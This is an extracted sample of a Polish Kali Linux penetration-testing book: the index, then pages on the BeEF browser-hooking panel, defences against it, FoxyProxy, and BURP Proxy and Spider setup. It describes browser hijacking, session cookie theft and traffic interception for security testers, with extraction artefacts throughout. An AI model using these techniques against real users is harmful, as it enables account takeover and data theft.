amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
